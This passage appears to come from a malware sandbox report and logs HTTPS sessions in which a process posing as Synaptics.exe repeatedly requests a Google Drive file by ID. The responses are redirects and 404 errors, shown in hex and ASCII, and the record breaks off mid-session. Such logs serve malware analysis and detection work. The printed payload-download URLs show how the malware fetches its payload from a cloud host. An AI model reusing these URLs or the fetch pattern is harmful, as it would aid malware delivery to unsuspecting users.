                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:48 UTC148INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not
                                                                                            2025-01-02 19:29:48 UTC1390INData Raw: 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 43 4f 35 47 32 56 43 6f 31 7a 72 78 4d 6f 74 73 36 38 7a 69 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a
                                                                                            Data Ascii: Found)!!1</title><style nonce="8CO5G2VCo1zrxMots68zig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:
                                                                                            2025-01-02 19:29:48 UTC114INData Raw: 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            36192.168.2.949924172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:48 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            37192.168.2.949926216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:48 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            38192.168.2.949930216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:48 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            39192.168.2.949927172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:49 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            40192.168.2.949932172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:49 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:50 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:49 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-PNl0-X5NhqfwAD6o_FRCkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            41192.168.2.949931172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:49 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm
                                                                                            2025-01-02 19:29:50 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:50 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-AjSM1MeC6UXIQTXA4hqTzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            42192.168.2.949946172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:50 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:51 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:50 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-9fk6tUkkPDy2VB2d3TKsNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            43192.168.2.949947216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:50 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:51 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4q_i4R9iAPd08uD7c-QZdb6UPJ_76hEqZvuyPyUYc9CmgPSxcxVoF8fp-0jocGfYsodmDvzJM
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:51 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-G1EYSmQaVnCZ7We_xeb5tg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:51 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:29:51 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 39 39 50 6f 64 5f 53 64 57 6e 76 72 77 6d 4c 4c 63 66 34 64 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="t99Pod_SdWnvrwmLLcf4dw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:29:51 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            44192.168.2.949949172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:50 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:51 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:51 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-5dZa9ELcsP5jqlt9MUT3ZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            45192.168.2.949948216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:50 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:51 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC45BK2ZiVCOJTylNCxCU5AqHYXXxu4ssPFjnSNcUIAWSMkmAh3wtStSCJ3paGj3WVVE
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:51 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ZbGoI6AkfDWf08z7tsCxsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:51 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:51 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 35 37 2d 50 73 74 51 33 79 66 50 6e 4a 36 49 4b 41 66 45 50 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="v57-PstQ3yfPnJ6IKAfEPg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:51 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            46192.168.2.949956172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:51 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
